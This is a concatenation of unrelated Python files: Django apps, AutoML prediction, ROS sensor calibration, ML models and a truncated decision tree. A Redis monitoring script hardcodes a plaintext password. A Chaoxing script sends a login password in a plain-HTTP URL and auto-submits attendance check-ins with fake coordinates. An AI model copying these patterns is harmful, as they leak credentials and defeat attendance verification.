router.register('recipeproducts', RecipeProductsView)
router.register('recipetaxonomy', RecipeTaxonomyView)
router.register('recipetips', RecipeTipsView)
router.register('taxonomy', TaxonomyView)
router.register('taxonomytype', TaxonomyTypeView)
router.register('taxonomytyperesource', TaxonomyTypeResourceView)
router.register('pictureformats', PicturesView)
router.register('v0.1', RecipesView)
urlpatterns = [
path('', include(router.urls)),
# url(r'^register/$', views.RegistrationView.as_view()),
path(r'swagger-docs/', schema_view),
# url(r'^o/', include('oauth2_provider.urls', namespace='oauth2_provider')),
# path('recipesapi/', RecipesView.as_view())
# url(r'^oauth2/', include('provider.oauth2.urls', namespace='oauth2')),
# url(r'^api-auth/', include('rest_framework.urls', namespace='rest_framework')),
]
|
# Copyright 2020 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Makes a prediction using the AutoML Tables model specified in the config.
Assumes that a model with the specified display name has already been trained,
and that the features for prediction have been generated. Prediction
jobs typically take 5-25 minutes to complete, based on the volume of data.
See https://cloud.google.com/automl-tables/docs/predict-batch for details.
"""
import logging
import sys
import google.api_core.exceptions
from google.cloud import automl_v1beta1 as automl
from google.cloud import bigquery
import utils
logging.basicConfig(level=logging.DEBUG)
def main():
"""Executes batch prediction using a model trained on AutoML.
Uses parameters specified in the configuration file, to determine the
read and write locations for features and predictions.
See the configuration file for more details.
1. Runs batch prediction operation on AutoML service.
2. Copies contents of the dataset autogenerated by AutoML into the
specified dataset.
3. Copies failed predictions to a new table unless all succeeded.
4. Deletes the autogenerated dataset if the user has permissions.
"""
config_path = utils.parse_arguments(sys.argv).config_path
config = utils.read_config(config_path)
# Defining subconfigs explicitly for readability.
global_config = config['global']
# Authenticate using AutoML service account credentials.
automl_client = automl.TablesClient(
project=global_config['destination_project_id'],
region=global_config['automl_compute_region'],
)
# Authenticate using Application Default Credentials.
bq_client = bigquery.Client(
project=global_config['destination_project_id'],
)
# Batch prediction operation is a Long Running Operation, .result() performs
# a synchronous wait for the prediction to complete before progressing.
# Input URI is the full path of the table of features for prediction, and
# output URI is the full path of the project to write predictions to.
# See https://cloud.google.com/automl-tables/docs/predict-batch for details.
batch_prediction_operation = automl_client.batch_predict(
bigquery_input_uri='bq://{}.{}.{}'.format(
global_config['destination_project_id'],
global_config['destination_dataset'],
global_config['features_predict_table']),
bigquery_output_uri='bq://{}'.format(
global_config['destination_project_id']),
model_display_name=global_config['model_display_name'],
)
batch_prediction_operation.result()
# AutoML generates a new dataset in the project with a destination that is
# not user specified, and writes predictions and failed predictions to
# "predictions" and "errors" respectively. A failed prediction, for example,
# may be the result of a numeric column that recieved a string. The batch
# prediction response contains the dataset uri with format
# "bq://project_id.output_dataset".
automl_dataset_id = (
batch_prediction_operation
.metadata
.batch_predict_details
.output_info
.bigquery_output_dataset
).split('bq://')[-1]
predictions_table = bq_client.get_table(automl_dataset_id + '.predictions')
failed_predictions_table = bq_client.get_table(automl_dataset_id + '.errors')
# Copy predictions to dataset, fails if table already exists.
bq_client.copy_table(
sources=predictions_table,
destination='{}.{}.{}'.format(
global_config['destination_project_id'],
global_config['destination_dataset'],
global_config['predictions_table']),
).result()
# Copy the failed predictions table only if it is not empty.
if failed_predictions_table.num_rows > 0:
bq_client.copy_table(
sources=failed_predictions_table,
destination='{}.{}.{}'.format(
global_config['destination_project_id'],
global_config['destination_dataset'],
global_config['failed_predictions_table']),
).result()
logging.warning("%d rows in the batch prediction job failed.",
failed_predictions_table.num_rows)
# Delete the dataset created by AutoML, catches Forbidden exception raised if
# account does not have BQ Data Owner permissions.
try:
bq_client.delete_dataset(automl_dataset_id, delete_contents=True)
except google.api_core.exceptions.Forbidden:
logging.warning(
"Failed to delete BQ dataset generated by AutoML batch prediction."
" Requires BQ Data Owner permissions to delete.")
if __name__ == '__main__':
main()
|
# B. Box Fitting
from collections import Counter, OrderedDict
for _ in range(int(input())):
n, W = map(int, input().split())
inp = list(map(int, input().split()))
mp = OrderedDict(Counter(sorted(inp, reverse=True)))
ans = 0
while n > 0:
w_left = W
for w in mp:
while w <= w_left and mp[w] > 0:
w_left -= w
mp[w] -= 1
n -= 1
ans += 1
print(ans)
|
#!/usr/bin/env python
#coding:utf-8
#Author Fleece_Lin Mail: linuxlzy@163.com QQ: 594621466
import redis
import sys
keyindex = ['used_memory', 'used_memory_rss', 'mem_fragmentation_ratio', 'blocked_clients', 'connected_clients',
'connected_slaves',
'instantaneous_ops_per_sec', 'keyspace_hits', 'keyspace_misses', 'keypace_query_total_count',
'keyspace_hits_rate', 'status']
returnval = None
def zabbix_faild():
print "ZBX_NOTSUPPORTED"
sys.exit(2)
if len(sys.argv) != 2 :
zabbix_faild()
try:
conn=redis.Redis(host='10.10.3.',port='6379',password='LSy9OetOxT7GiItO')
except Exception, e:
zabbix_faild()
if sys.argv[1] in keyindex:
if sys.argv[1] == 'status':
try:
conn.ping()
returnval = 1
except Exception,e:
returnval = 0
elif sys.argv[1] == 'keyspace_hits_rate':
merit = conn.info()
keyspace_hits_count = float(merit['keyspace_hits'])
keyspace_misses_count = float(merit['keyspace_misses'])
keyspace_hits_rate = keyspace_hits_count / (keyspace_hits_count + keyspace_misses_count) * 100
returnval = keyspace_hits_rate
elif sys.argv[1] == 'keypace_query_total_count':
merit = conn.info()
keyspace_hits_count = merit['keyspace_hits']
keyspace_misses_count = merit['keyspace_misses']
keypace_query_total_count = keyspace_hits_count + keyspace_misses_count
returnval = keypace_query_total_count
else:
merit = conn.info()
try:
returnval = merit[unicode(sys.argv[1])]
except Exception,e:
pass
if returnval == None:
zabbix_faild()
else:
print returnval
|
#!/usr/bin/python
'''
Created on Sun Octoer 12, 2019
@author: 2.009 Purple
This subscribes to the data published by multiple_fsr.py and calibrates for a sepecific user
'''
import rospy
import getch
import serial
from fsr_readout.msg import forces
from std_msgs.msg import (
Bool,
String,
Int32,
Float64,
Float64MultiArray,
UInt16,
Empty
)
class Calibrate_and_Measure():
def __init__(self):
#Name the node
rospy.init_node('calibration', anonymous=True)
self.calibrated = False
self.first_loop = False
self.data_collection = []
self.previous_forces = [0,0,0]
rospy.loginfo('Need to calibrate first')
rospy.loginfo('Please step onto the pad and press enter when done')
#The script will not continue unless the user presses enter
user = raw_input()
rospy.Subscriber('forces', forces, self.cb_forceReadout)
def cb_forceReadout(self, data):
'''
Collects the raw data from the multiple_fsr script and puts it into a list
'''
#Defining the parts of the list
forces = []
forces.append(data.heel)
forces.append(data.inner)
forces.append(data.outer)
print(forces)
#Check to see if the user was calibrated; if not calibrated, calibrate; if calibrated, be prepared to provide feedback
if not self.calibrated:
# print('here')
self.calibrate(forces)
else:
self.feedback()
def calibrate(self, forces):
'''
This function is for calibrating for a specific user.
It asks the user to squat and collects the data accordingly.
Lastly, it measures percentages throughout different points of the squat to see weight distribution.
'''
if not self.first_loop:
rospy.loginfo('Begin squatting and get off pad when done')
self.first_loop = True
#Defining list for entire data_collection during calibration
# rospy.loginfo(forces)
self.data_collection.append(forces)
if sum(forces) == 0 and sum(self.previous_forces)!=0:
rospy.loginfo(self.data_collection)
rospy.loginfo("Would you like to recalibrate? Enter 'yes' or 'no'.")
user = raw_input()
if user == 'yes':
self.calibrated = False
self.first_loop = False
self.data_collection = []
rospy.loginfo('Please step onto the pad and press enter when done')
#The script will not continue unless the user presses enter
user = raw_input()
else:
self.calibrated = True
self.previous_forces = forces
def feedback(self):
rospy.loginfo('Feedback time')
if __name__ == '__main__':
begin = Calibrate_and_Measure()
try:
rospy.spin()
except rospy.ROSInterruptException:
pass |
#coding:utf-8
import os
import pickle
import amipy
import w3lib.url as urltool
class Request(object):
def __init__(self,spider,url,*,
callback=None,
headers=None,
errback=None,
excback=None,
params=None,
proxy=None,
proxy_auth=None,
kwargs_cb=None,
cookies=None,
data=None,
down_type=None,
filter=None,
fingerprint=None,
timeout=None,
obey_robots_txt=None,
ignore = False,
save_path=None,
encoding='utf-8',
method='GET',
retry=0,
priority=0,
delay = 0,):
assert isinstance(spider, amipy.Spider),\
f'the Request should be bounded to a Spider,' \
f'got "{type(spider).__name__}".'
assert isinstance(kwargs_cb,dict) or kwargs_cb is None,\
'params from Request to success callback should be a dict.'
assert isinstance(proxy_auth, dict) or proxy_auth is None, \
'Auth for proxy should be a dict.'
callback = callback if callback else spider.parse
errback = errback if errback else spider.error
excback = excback if excback else spider.exception
assert callback or kwargs_cb is not None,\
'there is no callback function for the Request.'
assert callable(callback),\
f'callback should be a coroutine function ,' \
f'got "{type(callback).__name__}".'
assert callable(errback) or errback is None, \
f'errback should be a coroutine function,' \
f'got "{type(errback).__name__}".'
assert callable(excback) or excback is None, \
f'excback should be a coroutine function,' \
f'got "{type(excback).__name__}" .'
assert method.strip().upper() in \
('GET','POST','HEAD','PUT','DELETE','UPDATE'), \
"the method of a Request should be one of " \
"the ['GET','POST','HEAD','PUT','DELETE','UPDATE']. "
self.spider = spider
self.callback = callback
self.errback = errback
self.excback = excback
self.encoding = encoding
self.priority = priority
self.method = method
self.data = data
self.params = params
self.fingerprint = fingerprint
self.headers = headers
self.proxy = proxy
self.proxy_auth = proxy_auth
self._ignore = ignore
self.save_path = save_path
self._tried = 0
self.session = spider.session
self.filter = bool(filter) if filter != None \
else spider.settings.BLOOMFILTER_URL_ON
self.obey_robots_txt = bool(obey_robots_txt) if \
obey_robots_txt != None else spider.settings.ROBOTS_TXT_OBEY
self.kwargs_cb = {} if not kwargs_cb \
else kwargs_cb
self.down_type = down_type if down_type != None\
else spider.settings.DEFAULT_DOWNLOAD_TYPE
self.retry = retry if retry !=0 \
else spider.settings.REQUEST_RETRY
self.delay = delay if delay !=0 \
else spider.settings.REQUEST_DELAY
self.timeout = timeout if timeout is not None \
else spider.settings.REQUEST_TIMEOUT
self._set_url(url)
self._load_cookies(cookies)
self._set_delegate(spider.binding_hub.delegate)
def _set_url(self,url):
self.url = urltool.canonicalize_url(
urltool.safe_download_url(url),encoding=self.encoding)
def _load_cookies(self,cookies):
if isinstance(cookies,dict):
self.session.cookie_jar.update_cookies(cookies)
elif isinstance(cookies,str):
if os.path.exists(cookies):
with open(cookies,'rb') as f:
rawdata = pickle.load(f)
try:
self.session.cookie_jar.update_cookies(rawdata)
except:
try:
_c_cookie = {j.key:j.value for i in rawdata.values()
for j in i.values()}
self.session.cookie_jar.update_cookies(_c_cookie)
except:
return
def _set_delegate(self,func):
self.delegate_func = func
@property
def delegate_func(self):
return self._func
@delegate_func.setter
def delegate_func(self,func):
if func is None:
self._func = None
elif not callable(func):
raise TypeError('delegate func should be callable,got "%s".'\
%type(func).__name__)
else:
self._func = func
@property
def url(self):
return self.__url
@url.setter
def url(self,url):
#only starts with schema:file,http,https allowed to be a valid url
if not urltool.is_url(url):
raise ValueError('Not a valid url for Request.Got:%s'%url)
else:
self.__url = urltool.safe_download_url(url)
def __str__(self):
return '<Request obj at %s [ spider=%s url=%s ] >'\
%(hex(id(self)),self.spider.name,self.url)
def __gt__(self, other):
return self.spider > other.spider or \
self.priority < other.priority
|
from yoamisafe import views
from django.conf.urls import patterns, include, url
urlpatterns = patterns("",
url(r'/temp', views.temp, name='temp'),
url(r'^/map/.*', views.map, name='map'),
)
|
from django.shortcuts import render
from weddingApp.models import RSVP
from django.views.generic import (TemplateView,ListView,
DetailView,CreateView,
UpdateView,DeleteView)
# Create your views here.
class HomeView(TemplateView):
template_name = 'weddingApp_home.html'
class RSVPView(TemplateView):
template_name = 'weddingApp_rsvp.html'
class InfoView(TemplateView):
template_name = 'weddingApp_info.html'
class GalleryView(TemplateView):
template_name = 'weddingApp_gallery.html'
class ShareView(TemplateView):
template_name = 'weddingApp_share.html'
class ThanksView(TemplateView):
template_name = 'weddingApp_thanks.html'
class RSVPCreateView(CreateView):
model = RSVP
fields = "__all__"
|
import requests, json, time
coursedata = []
activeList = []
course_index = 0
speed = 10
uid=0
status = 0
status2 = 0
activates = []
quantity = 0
a = 1
# 获取cookie
def get_cookie(user_id,password):
global uid
url="http://i.chaoxing.com/vlogin?passWord="+str(password)+"&userName="+str(user_id)
res=requests.get(url)
# cookies = requests.utils.dict_from_cookiejar(res.cookies)
cookie_value = ''
for key, value in res.cookies.items():
if key=="_uid":
uid=value
cookie_value += key + '=' + value + ';'
# print (cookie_value)
return (cookie_value)
headers = {
"Cookie": get_cookie("",""),
"User-Agent": "Mozilla/5.0 (iPad; CPU OS 13_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/15E148 ChaoXingStudy/ChaoXingStudy_3_4.3.2_ios_phone_201911291130_27 (@Kalimdor)_11391565702936108810"
}
def taskactivelist(courseId, classId):
global activeList, a
url = "https://mobilelearn.chaoxing.com/ppt/activeAPI/taskactivelist?courseId=" + str(courseId) + "&classId=" + str(
classId) + "&uid=" + uid
res = requests.get(url, headers=headers)
data = json.loads(res.text)
activeList = data['activeList']
# print(activeList)
for item in activeList:
if ("nameTwo" not in item):
continue
print('1')
if (item['activeType'] == 2 and item['status'] == 1):
signurl = item['url']
aid = getvar(signurl)
# print('2')
if (aid not in activates):
print('[签到]', i, '号课查询到待签到活动 活动名称:%s 活动状态:%s 活动时间:%s aid:%s' % (
item['nameOne'], item['nameTwo'], item['nameFour'], aid))
sign(aid, uid)
a = 2
# print('调用签到函数')
def getvar(url):
var1 = url.split("&")
for var in var1:
var2 = var.split("=")
if (var2[0] == "activePrimaryId"):
return var2[1]
return "ccc"
def sign(aid, uid):
global status, activates
url = "https://mobilelearn.chaoxing.com/pptSign/stuSignajax?activeId=" + aid + "&uid=" + uid + "&clientip=&latitude=-1&longitude=-1&appType=15&fid=0"
res = requests.get(url, headers=headers)
if (res.text == "success"):
print("用户:" + uid + " 签到成功!")
activates.append(aid)
status = 2
else:
print("签到失败")
activates.append(aid)
def get_coursedata():
global quantity
url = "http://mooc1-api.chaoxing.com/mycourse/backclazzdata?view=json&rss=1"
res = requests.get(url, headers=headers)
cdata = json.loads(res.text)
if (cdata['result'] != 1):
print("课程列表获取失败")
for item in cdata['channelList']:
if ("course" not in item['content']):
continue
pushdata = {}
pushdata['courseid'] = item['content']['course']['data'][0]['id']
pushdata['name'] = item['content']['course']['data'][0]['name']
# pushdata['imageurl'] = item['content']['course']['data'][0]['imageurl']
pushdata['classid'] = item['content']['id']
coursedata.append(pushdata)
print("获取成功:")
index = 0
for item in coursedata:
print(str(index) + ".课程名称:" + item['name'])
index += 1
quantity += 1
get_coursedata()
while 1:
for i in range(quantity):
taskactivelist(coursedata[i]['courseid'], coursedata[i]['classid'])
time.sleep(10)
if a == 2:
a = 0
else:
print('[签到]监控运行中,', i, '号课未查询到签到活动')
|
import pandas as pd
def get_data_by_year(year_list):
df_list = list()
for year in year_list:
file_path = f'names\yob{year}.txt'
df = pd.read_csv(file_path, names=['Name', 'Gender', 'Qty'])
df['Year'] = year
df_list.append(df)
return pd.concat(df_list)
def count_top3(year_list):
df = get_data_by_year(year_list)
top_3 = df.sort_values(by='Qty', ascending=False)
return top_3.head(3)['Name'].to_list()
def count_dynamics(year_list):
df = get_data_by_year(year_list)
df_grouped = df.groupby(
by=['Gender', 'Year']
).agg({
'Name' : 'count'
})
df_grouped = df_grouped.reset_index()
result = dict()
female_names = df_grouped[df_grouped['Gender'] == 'F']['Name'].to_list()
male_names = df_grouped[df_grouped['Gender'] == 'M']['Name'].to_list()
result['F'] = female_names
result['M'] = male_names
return result
if __name__ == "__main__":
# получаем топ-3 имен за указанные года
count_top3([1900, 1950, 2000])
# получаем динамику за указанные года
count_dynamics([1900, 1950, 2000])
|
from .fetch import db_fetch, GatherInfo, ContentInfo, Statistic
from .telephone import db_tel, CompanyInfo, StatInfo
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 5 16:10:03 2019
@author: andreascazzosi
"""
# =============================================================================
# Class
# =============================================================================
class Player:
players_list = []
change_probability = True
def checkopinion():
for player in Player.players_list:
if player.getopinion() != Player.players_list[0].getopinion():
return False
return True
def countforopinion(opinion):
count = 0
for player in Player.players_list:
if player.getopinion() == opinion:
count += 1
return count
def __init__(self, probability = 0, opinion = 0):
self.probability = probability
self.opinion = opinion
Player.players_list.append(self)
def delete(self):
Player.players_list.remove(self)
def findopponent(self, opponents):
possible_opponent = []
positions = []
for i in range(len(opponents)):
if self.opinion != opponents[i].opinion:
possible_opponent.append(opponents[i].probability)
positions.append(i)
position = positions[possible_opponent.index(max(possible_opponent))]
return position
def shooting(self, opponent):
import random
if self.probability >= random.random():
opponent.setopinion(self.opinion)
if Player.getchange_probability():
opponent.setprobability(self.probability)
def setchange_probability(new_value):
Player.change_probability = new_value
def getchange_probability():
return Player.change_probability
def delete_list(list_):
for item in list_:
item.delete()
def delete_matrix(matrix):
for list_ in matrix:
for item in list_:
item.delete()
def setprobability (self, probability):
self.probability = probability
def setopinion(self, opinion):
self.opinion = opinion
def getopinion(self):
return self.opinion
def getprobability(self):
return self.probability
|
#!/usr/bin/env python3
from types import SimpleNamespace
from lilaclib import *
g = SimpleNamespace()
build_prefix = 'extra-x86_64'
def pre_build():
g.oldfiles = clean_directory()
g.files = download_official_pkgbuild('firefox')
for line in edit_file('PKGBUILD'):
if line.startswith('pkgname='):
line = 'pkgname=firefox-gtk2'
elif line.startswith('depends=('):
line = line.replace("'gtk3' ", "")
line = line.replace("gtk3 ", "")
line = """conflicts=('firefox')
provides=("firefox=${pkgver}-${pkgrel}")\n""" + line
elif '$pkgname' in line:
line = line.replace('$pkgname', 'firefox')
# .mozconfig
elif 'MOZ_REQUIRE_SIGNING' in line:
continue
elif '--enable-official-branding' in line:
print('ac_add_options --enable-default-toolkit=cairo-gtk2')
print(line)
def post_build():
git_rm_files(g.oldfiles)
git_add_files(g.files)
git_commit()
if __name__ == '__main__':
single_main()
|
import asyncio
from datetime import datetime
from buffered_channel import BufferedChannel
from event import Event
class Stream:
def __init__(self, update, interval=0, name=None):
self.update = update
self.sources = []
self.sink = None
self.data_chan = BufferedChannel()
self.interval = interval # the interval to check the dataChan
self.cancelled = False
self.name = name
def to(self, sink):
'''
Connect a sink to this stream
'''
self.sink = sink
self.sink.sources.append(self)
async def run(self):
'''
Start polling for new data on the data channel (for all streams in the network)
'''
streams = self.to_list()
await asyncio.wait([stream.poll_data() for stream in streams])
async def propagate(self):
if not self.sources: # if it is a producer
if not self.sink:
await self.process(None)
else:
coroutine = self.process(None)
await self.output(coroutine)
elif self.sources and self.sink: # if it is a consumer and producer
event = await self.data_chan.get()
await self.output(self.process(event))
else: # if it is a consumer
event = await self.data_chan.get()
await self.process(event)
async def process(self, value):
'''
Wrapper for the self.update function that adds metric information as an object
'''
return await self.update(value)
async def output(self, coroutine):
'''
Wraps a self.process call to take metrics of its running time
'''
start_time = datetime.utcnow()
value = await coroutine
now = datetime.utcnow()
event = Event(value, self, now - start_time, now)
self.sink.data_chan.put(event)
async def poll_data(self):
while not self.cancelled:
await self.propagate()
await asyncio.sleep(self.interval/1000)
def to_list(self, skip=None):
'''
Run a function on each stream in the network
'''
if not skip:
skip = set()
if self in skip:
return []
skip.add(self)
streams = []
for source in self.sources:
streams = source.to_list(skip) + streams
streams.append(self)
if self.sink:
streams += self.sink.to_list(skip)
return streams
|
def diagonalDifference(arr):
dd = 0
du = 0
length = len(arr)
for i, line in enumerate(arr):
dd = dd + line[i]
du = du + line[length - 1 - i]
return abs(dd - du)
|
import departing_and_reducing_stopwords as DARS
import numpy as np
from TFIDF import TextVectorizer as TV
from BSKM import *
import os
import time
from sklearn.feature_extraction.text import TfidfVectorizer
import pickle
#from compiler.ast import flatten
def getfiles(path):
#filenames = os.listdir(r'E:\temp\program\python\git_2020_dachuang\dataset_mc\dataset_mc\bishe200m5')
filenames = os.listdir(path)
#print(filenames)
return filenames
#getfiles(r'E:\temp\program\python\git_2020_dachuang\dataset_mc\dataset_mc\bishe200m5')
def preprocessing(filenames):
for i in filenames:
time_start = time.time()
prefix = 'E:/temp/program/python/git_2020_dachuang/experiment/'
output_file_name = prefix + i
input_prefix = 'E:/temp/program/python/git_2020_dachuang/dataset_mc/dataset_mc/bishe200m5/'
input_text = input_prefix + i
tv = TV('E:\\temp\\program\\python\\git_2020_dachuang\\dataset_mc\\dataset_mc\\bishe200m5corpus_result.txt',input_text,'stopwords.txt','corpus_output.txt',output_file_name,max_df=0.15,min_df=0.0002)
tv.init_corpus_and_text()
tv.fitting()
tv.transforming()
wordlist = tv.getWordList()
weightlist = tv.getWeightList()
dict_ = tv.getDict()
file1 = prefix + i + 'file1.txt'
file2 = prefix + i + 'file2.txt'
file3 = prefix + i + 'file_reduce.txt'
tv.writeInFile(file1)
tv.writeTfidfInFileSorted(file2)
textvector,feature_name,feature_tfidf = tv.getTextVector()
dim = len(feature_name)
#print(dim)
size = dim
w = 1.4
c1=c2=1.2
gama = 0.9
theta = 5
max_vel = 1
iter_num = 100
gsbpso = GSBPSO(dim,size,iter_num,max_vel,theta,feature_tfidf,gama,c1=c1,c2=c2,w=w)
fitness_value_list,best_position = gsbpso.update()
print(best_position)
print(fitness_value_list[-1])
selected_feature = []
for i in range(len(best_position)):
if best_position[i] == 1:
selected_feature.append(i)
print(selected_feature)
list_feature = []
for i in selected_feature:
print(feature_name[i])
list_feature.append(feature_name[i])
with open(file3,'w',encoding='utf-8') as f3:
for i in list_feature:
f3.write(i)
f3.write(' ')
time_end = time.time()
print('time cost:',time_end-time_start,'s')
def labeling(x):
for i in range(len(x)):
x[i].append(int(i))
return np.array(x)
def getAllFeaturesAssemble(reduce_filenames):
t1 = time.time()
prefix = 'E:/temp/program/python/git_2020_dachuang/experiment/'
features_list = []
for i in reduce_filenames:
file_name = prefix + i
each_featrue = []
tmp_prefix = i.split('.')[1]
if tmp_prefix == 'txtfile_reduce':
with open(file_name,'r',encoding='utf-8') as f:
#f.readline()
each_featrue.append(f.readline())
print(each_featrue)
features_list.append(each_featrue)
else:
continue
t2 = time.time()
print('cost:',t2-t1,'s')
return features_list
if __name__ == "__main__":
#这两步用于对文本数据进行GSBPSO处理 得到约简后的文本特征集
#------------------------------------------------------------------
#filenames = getfiles(r'E:\temp\program\python\git_2020_dachuang\dataset_mc\dataset_mc\bishe200m5'
#preprocessing(filenames)
#------------------------------------------------------------------
#下面步骤用于提取处理后的文本特征集合
#------------------------------------------------------------------
#reduce_filenames = getfiles(r'E:\temp\program\python\git_2020_dachuang\experiment')
#features_list = getAllFeaturesAssemble(reduce_filenames)
#features_list = np.array(features_list)
#np.save('features_list.npy',features_list)
#print(features_list)
#print(features_list)
#------------------------------------------------------------------
#下面步骤用于将特征集合编码 用于下一步的聚类
features_list_tmp = np.load('features_list.npy')
features_list = []
features_list.extend([x[0] for x in features_list_tmp])
tfidf_vec = TfidfVectorizer()
tfidf_mat = tfidf_vec.fit_transform(features_list)
#print(tfidf_mat.toarray())
#print(np.shape(tfidf_mat.toarray()))
tfidf_mat_array = tfidf_mat.toarray()
tfidf_mat_array = labeling(tfidf_mat_array.tolist())
#bskm = BSKM(tfidf_mat_array,5,300,0.0001)
#bskm.fit()
#print(bskm.centers)
#centers = bskm.centers
#clf = bskm.clf
#------------------------------------------------------------------
#保存分好的簇以及各个样本归属情况
#------------------------------------------------------------------
#with open('centers.txt','wb') as f1:
# pickle.dump(centers,f1)
#with open('clf.txt','wb') as f2:
#f2.write(str(clf))
# pickle.dump(clf,f2)
bskm = BSKM(tfidf_mat_array,5,300,0.0001)
bskm.fit()
print(bskm.centers)
print(bskm.clf_label)
centers = bskm.centers
clf = bskm.clf
clf_label = bskm.clf_label
#------------------------------------------------------------------
#保存分好的簇以及各个样本归属情况
#------------------------------------------------------------------
with open('centers.txt','wb') as f1:
pickle.dump(centers,f1)
with open('clf.txt','wb') as f2:
#f2.write(str(clf))
pickle.dump(clf,f2)
with open('clf_labeled.txt','wb') as f3:
pickle.dump(clf_label,f3)
with open('centers.txt','rb+') as f1:
centers_load = pickle.load(f1)
with open('clf.txt','rb+') as f2:
clf_load = pickle.load(f2)
with open('clf_labeled.txt','rb+') as f3:
clf_labeled_load = pickle.load(f3)
#print(type(centers_load))
#print(centers_load)
#print(type(clf_load))
#print(clf_load)
#np.save('centers.npy',centers) 导致保存的不是dict 弃用
#np.save('clf.npy',clf)
#------------------------------------------------------------------
#centers_load = np.load('centers.npy',allow_pickle=True)
#clf_load = np.load('clf.npy',allow_pickle=True)
#print('dict = ',centers_load)
#print('clf = ',clf_load)
#------------------------------------------------------------------
#print(label)
#print(centers)
#print(clf)
#------------------------------------------------------------------
#------------------------------------------------------------------
#print(clf_load)
#print(len(tfidf_mat_array.tolist()))
|
import sys
import torch
import torch.nn as nn
import torch.nn.functional as F
import torchvision.models as models
class EmbeddingNet(nn.Module):
"""ResNet50 except the classification layer to extract feature
"""
def __init__(self, network='cifar_resnet50', pretrained=False, embedding_len=128, gap=True, freeze_parameter=False):
"""Using ResNet50 with a linear layer (2048,128) to extract feature
"""
super(EmbeddingNet, self).__init__()
self.freeze_parameter = freeze_parameter
model = self.select_network(network, pretrained, extract_feature=freeze_parameter)
modules = list(model.children())
self.convnet = nn.Sequential(*modules)
self.fc1 = nn.Linear(2048, 1024)
self.fc1_bn = nn.BatchNorm1d(1024)
self.relu = nn.ReLU()
self.fc2 = nn.Linear(1024, embedding_len)
self.fc0 = nn.Linear(25088, 2048)
self.fc0_bn = nn.BatchNorm1d(2048)
self.relu0 = nn.ReLU()
def forward(self, x):
"""extract feature
Args:
x: [batch_size, 3, 32, 32]
return:
output: [batch_size, 128]
"""
output = self.convnet(x)
output = output.view(output.size(0), -1)
if not self.freeze_parameter:
if output.size(1) == 25088:
output = self.fc0(output)
output = self.fc0_bn(output)
output = self.relu0(output)
output = self.fc1(output)
output = self.fc1_bn(output)
output = self.relu(output)
output = self.fc2(output)
output = self.normalize(output)
return output
def get_embedding(self, x):
return self.forward(x)
def normalize(self, x):
"""normalize by L2
Args:
x: [b, 128]
"""
x_l2 = torch.norm(x, dim=1, p=2, keepdim=True)
x = x / x_l2.expand_as(x)
return x
def select_network(self, network, pretrained, extract_feature=False):
"""select network"""
if network == 'resnet50':
print('using {}'.format('resnet50'))
model = models.resnet50(pretrained=pretrained)
model = nn.Sequential(*(list(model.children())[:-1]))
elif network == 'resnet152':
print('using {}'.format('resnet152'))
model = models.resnet152(pretrained=pretrained)
model = nn.Sequential(*(list(model.children())[:-1]))
elif network == 'densenet161':
print('using {}'.format('densenet161'))
model = models.resnet152(pretrained=pretrained)
model = nn.Sequential(*(list(model.children())[:-1]))
elif network == 'SE-Net':
print('using {}'.format('SE-Net'))
#model = models.resnet152(pretrained=pretrained)
#model = nn.Sequential(*(list(model.children())[:-1]))
pass
elif network == 'vgg19_bn':
print('using {}'.format('vgg19 feature'))
vgg19_bn = models.vgg19_bn(pretrained=pretrained)
model = vgg19_bn.features
if not extract_feature:
model = nn.Sequential(
*(list(model.children())),
nn.AdaptiveAvgPool2d(output_size=(7, 7)),
)
elif network == 'cifar_resnet50':
print('using {}'.format('cifar_resnet50'))
model = models.resnet50(pretrained=pretrained)
model.conv1.stride = 1
model = nn.Sequential(
*(list(model.children())[0:3]),
*(list(model.children())[4:-2]),
nn.AdaptiveAvgPool2d(1)
)
else:
sys.exit(-1)
return model
def freeze_model(self, model):
"""freeze parameters in model"""
print('Frezzing model:{}')
for param in model.parameters():
param.requires_grad = False
return model
class ClassificationNet(nn.Module):
def __init__(self, embedding_net, n_classes=10, embedding_len=128):
super(ClassificationNet, self).__init__()
self.embedding_net = embedding_net
self.n_classes = n_classes
self.nonlinear = nn.ReLU()
self.classification = nn.Linear(embedding_len, n_classes)
def forward(self, x):
output = self.embedding_net(x)
output = self.nonlinear(output)
output = self.classification(output)
return output
def get_embedding(self, x):
return self.nonlinear(self.embedding_net(x))
|
import pandas as pd
import numpy as np
import random as rd
illegal = ["Class"]
class decisionTree:
""""A class that represents a binary decision tree"""
leadingNode = None
nodeArray = []
def addNode(self, node):
self.leadingNode = node
def printTree(self):
pipelines = 0
zero = self.leadingNode.label + " = 0 :"
if self.leadingNode.leafZero and self.leadingNode.zeroNode.label == "Zero":
zero += " 0"
print(zero)
elif self.leadingNode.leafOne and self.leadingNode.zeroNode.label == "One":
zero += " 1"
print(zero)
else:
print(zero)
self.printTreeHelper(pipelines, self.leadingNode.zeroNode)
one = self.leadingNode.label + " = 1 :"
if self.leadingNode.leafZero and self.leadingNode.oneNode.label == "Zero":
one += " 0"
print(one)
elif self.leadingNode.leafOne and self.leadingNode.oneNode.label == "One":
one += " 1"
print(one)
else:
print(one)
self.printTreeHelper(pipelines, self.leadingNode.oneNode)
def printTreeHelper(self, pipelines, n):
pipelines += 1
zero = ""
one = ""
for i in range(pipelines):
zero += "| "
one += "| "
zero += n.label + " = 0 :"
try:
if n.leafZero:
zero += " 0"
print(zero)
elif n.leafOne:
zero += " 1"
print(zero)
else:
print(zero)
self.printTreeHelper(pipelines, n.zeroNode)
except:
0
try:
one += n.label + " = 1 :"
if n.leafZero:
one += " 0"
print(one)
elif n.leafOne:
one += " 1"
print(one)
if not n.leafZero or not n.leafOne:
#print(one)
self.printTreeHelper(pipelines, n.oneNode)
except:
1
def test(self, testingFileName):
correct = 0
total = 0
tf = pd.read_csv(testingFileName)
classCol = tf[['Class']]
for i, row in tf.iterrows():
answer = -1
if row[self.leadingNode.label] == 0:
if self.leadingNode.leafZero:
answer = 0
else:
answer = self.testHelper(self.leadingNode.zeroNode, row)
elif row[self.leadingNode.label] == 1:
